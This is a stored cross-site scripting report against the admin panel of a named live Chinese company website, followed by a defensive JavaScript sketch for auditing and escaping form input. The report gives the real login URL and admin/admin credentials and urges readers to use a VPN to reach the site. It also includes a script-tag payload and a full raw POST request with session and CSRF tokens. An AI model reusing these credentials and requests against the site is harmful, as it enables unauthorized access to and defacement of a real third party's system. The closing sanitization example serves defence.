The vulnerability exists: http://gzjs.lizhong.com.cn/admin/auth/login. This is a Chinese company site; if you can't access it, please use a VPN to access this site.
The username is admin, password is admin.
Insert the XSS (cross-site scripting) attack code.
payload
<script>alert("1");</script>
This operation will trigger the XSS payload.
Every time you click this new article it can trigger the XSS payload, so this is a Stored XSS vulnerability.
poc
`POST /admin/articles HTTP/1.1
Host: gzjs.lizhong.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: cCDnL0JDntXSzT9WcJEq4B1RrlNcOHHzRE7eosRW
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------18231965531676293850890598005
Content-Length: 4164
Origin: http://gzjs.lizhong.com.cn
Connection: close
Cookie: Hm_lvt_6d6cdee566cc672070f704327371cc88=1727264615; XSRF-TOKEN=eyJpdiI6IlJmWlozMnhTRnEyazRTMTh6ZzlLS0E9PSIsInZhbHVlIjoiMjl3Y01GYWxTTjVVcHpiWHlQK3ZqRzFhRkxrMC9HdkJIL1hPWERudjl0NmVyUjVDdkR4eE9PMUNHTjdJYnJiWm1vM2s5UjR4YmdzM3ZxZU1ZbmxzQlFaRmM4Z2ZGRXpWS1NZS0RhV28xeXIxY0hMLzIwU0dDOFFITWRyVG45L0EiLCJtYWMiOiI1NWQyZTk5YzgyZjFmMmZjNDcxOWRiMmY4YWI1ZWE0MjRiYWI2OGY4OWUwZjIyMmQwN2U3Y2Y5MjExODEzODIyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBXSGo1R0VzOVhxY1FHMUxqR1ZkR3c9PSIsInZhbHVlIjoiaTE5WjUvWnFCRUdRSXBYRy9meGhMbjdPektrck1ramdWQ2lPbUdxbmtzNGRDVGg4TTJONG1qUlRJbGs3bDBicWxXSG5XcVhvWm1Oam1GdW1XTllnUjVaL1lKKzMzVDBiYkxLT3UyWDVNRmYyYitFbE5JK0c0ZnFjTTNjNzdLL3IiLCJtYWMiOiJhODAzMjI2MjZlNmNiYTQ0NWZhNzE5ZTg4ZTg5ZGIyN2MyZDVkNjAwNjFjNDhiMDFkYWEwYjE3M2ZhODVhMDlmIiwidGFnIjoiIn0%3D
Priority: u=0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="category_id"
-----------------------------18231965531676293850890598005
<script>alert("1");</script>Content-Disposition: form-data; name="title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="en_title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="description"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="author"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="source"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="module_id"
1
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="is_top"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="is_hot"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="sort"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="thumb"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="image"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list_2"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="pic_list_3"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="file"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="content"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="content_2"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="state"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="state"
0
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="time"
2024-11-16 01:47:34
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_title"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_keyword"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="seo_description"
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="previous"
http://gzjs.lizhong.com.cn/admin/articles
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="previous"
http://gzjs.lizhong.com.cn/admin/articles
-----------------------------18231965531676293850890598005
Content-Disposition: form-data; name="_token"
cCDnL0JDntXSzT9WcJEq4B1RrlNcOHHzRE7eosRW
-----------------------------18231965531676293850890598005--`
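
For the defending side, the sketch below audits a submission shaped like the request above for markup in plain-text fields and HTML-encodes stored values when the article list is rendered. It is an added example, not code from the report or from the affected application; the boundary `B`, the sample values, the `RICH_TEXT_FIELDS` set and all function names are assumptions made for illustration.

```javascript
// Added example, not code from the report. Field names come from the request
// above; the boundary, sample values and RICH_TEXT_FIELDS are constructed.
const RICH_TEXT_FIELDS = new Set(["content", "content_2"]); // assumption: editor-backed fields

const SAMPLE_BODY = [
  "--B", 'Content-Disposition: form-data; name="title"', "", '<script>alert("1");</script>',
  "--B", 'Content-Disposition: form-data; name="author"', "", "editor",
  "--B", 'Content-Disposition: form-data; name="content"', "", "<p>Body text</p>",
  "--B--", "",
].join("\r\n");

// Split a multipart/form-data body into [name, value] pairs (text parts only).
function parseMultipart(body, boundary) {
  const partRe = /^\r\nContent-Disposition: form-data; name="([^"]*)"\r\n\r\n([\s\S]*?)\r\n$/;
  const parts = [];
  for (const chunk of body.split("--" + boundary)) {
    const m = chunk.match(partRe);
    if (m) parts.push([m[1], m[2]]);
  }
  return parts;
}

// Encode the characters that are significant in element content and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Input-side audit: plain-text fields that arrive carrying markup characters.
function flagSuspectFields(parts) {
  return parts
    .filter(([name, value]) => !RICH_TEXT_FIELDS.has(name) && /[<>]/.test(value))
    .map(([name]) => name);
}

// Output-side fix: every stored value is encoded at the point it enters HTML.
function renderArticleRow(fields) {
  return `<tr><td>${escapeHtml(fields.title)}</td><td>${escapeHtml(fields.author)}</td></tr>`;
}

const parts = parseMultipart(SAMPLE_BODY, "B");
console.log(flagSuspectFields(parts));                    // fields to log or reject
console.log(renderArticleRow(Object.fromEntries(parts))); // inert markup in the list view
```

The audit is a logging and triage aid only; the encoding in `renderArticleRow` is what keeps a stored value from executing, and rich-text fields need an allow-list HTML sanitizer rather than plain encoding.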